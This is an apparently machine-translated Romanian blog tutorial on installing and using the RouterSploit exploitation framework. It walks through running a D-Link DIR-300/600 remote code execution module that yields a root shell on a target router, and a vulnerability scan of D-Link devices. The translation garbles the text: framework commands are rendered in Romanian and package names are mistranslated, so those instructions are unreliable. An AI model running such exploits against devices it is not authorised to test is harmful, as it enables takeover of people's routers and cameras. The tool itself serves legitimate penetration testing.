Acasă » Instrumente Linux » RouterSploit – Cadru de exploatare Tutorial complet [2020]

RouterSploit – Cadru de exploatare Tutorial complet [2020]

de Suyash
routersploit

RouterSploit este un cadru de exploatare uimitor creat special pentru dispozitivele încorporate.

Acest instrument poate fi folosit de pentester pentru a scana securitatea camerelor și a routerelor.

Repere RouterSploit:

  • Codat în Python.
  • Interfață de linie de comandă.
  • Suport Docker.
  • Instrumente modulare.

Sistem de operare acceptat:

  1. MacOS.
  2. Linux.
  3. Telefon Android.
  4. Ferestre.

Instalarea RouterSploit:

Cerințe:

  • viitor
  • cereri
  • Paramic
  • Stop
  • pycrypto

Opțional:

  • bluepy – bluetooth energie scăzută

Instalare în Kali Linux:

Urmați comenzile de mai jos:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Suport Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalare în Ubuntu:

Urmați comenzile de mai jos:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Suport Bluetooth Low Energy:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalarea pe MacOS:

Urmați comenzile de mai jos:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Se instalează pe Docker:

Urmați comenzile de mai jos:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Cum se actualizează RouterSploit?

Trebuie să actualizați frecvent RouterSploit pentru a evita inconvenientele.

Modulele noi sunt livrate aproape în fiecare zi.

cd routersploit
git pull

Cum se utilizează RouterSploit?

Utilizare

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Cadrul de exploatare pentru    |_|   de Threat9
            Dispozitive încorporate
  
 Nume de cod   : Știam că eşti problematic
 Versiune    : 3.3.0
 Pagina de pornire   : https://www.threat9.com/ - @threatnine
 Alăturați-vă Slack : routersploit.slack.com

 Alăturați-vă programului Beta Threat9 - https://www.threat9.com/

 Exploatările: 128 Scanere: 4 Creds: 165 Generic: 4 Sarcini utile: 32 Codificatoare: 6

rsf >

Exploatările:

Pentru a preforma Exploatarea, alegeți modulul și setați ținta:

rsf > folosește exploit-uri/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > utilizați exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Pentru finalizare, utilizați tasta Tab.

Pentru a afișa opțiuni, tipshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > afișează opțiuni

Opțiuni de țintă:


   Nume Setări curente Descriere                                
   ----       ----------------     -----------                                
   țintă Adresă țintă de ex. http://192.168.1.1     
   port       80                   Port țintă

Utilizarerun sauexploit comanda pentru a exploata ținta:

rsf (D-LINK DIR-300 & DIR-600 RCE) > alerga
[+] Ținta este vulnerabilă
[*] Se invocă bucla de comandă...
cmd > whoami
rădăcină

Pentru a seta opțiuni:

rsf (D-LINK DIR-300 & DIR-600 RCE) > setați http țintă://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Este posibil să verificați dacă ținta este vulnerabilă la o anumită exploatare:

rsf (D-LINK DIR-300 & DIR-600 RCE) > verifica
[+] Ținta este vulnerabilă

Fugishow info pentru a afișa informații despre exploit.

Scanarea pentru ținte vulnerabile:

Scanerele permit verificarea rapidă dacă ținta este vulnerabilă la orice exploatare.

Utilizați aceleași comenzi pentru a afișa/seta opțiuni, și, de asemenea, să alerge.

rsf (Scaner D-Link) > alerga
[+] exploits/dlink/dwr_932_info_disclosure este vulnerabil
[-] exploits/dlink/dir_300_320_615_auth_bypass nu este vulnerabil
[-] exploits/dlink/dsl_2750b_info_disclosure nu este vulnerabil
[-] exploits/dlink/dns_320l_327l_rce nu este vulnerabil
[-] exploits/dlink/dir_645_password_disclosure nu este vulnerabil
[-] exploits/dlink/dir_300_600_615_info_disclosure nu este vulnerabil
[-] exploits/dlink/dir_300_600_rce nu este vulnerabil

[+] Dispozitivul este vulnerabil!
- exploits/dlink/dwr_932_info_disclosure

RouterSploit oficial

Citește și: 1337x proxy

Cuvinte finale:

RouterSploit este un instrument uimitor de folosit.

Dacă vă confruntați cu probleme legate de RouterSploit. Asigurați-vă că comentați mai jos. Echipa noastră CSHAWK vă va contacta în cel mai scurt timp.

Lasa un comentariu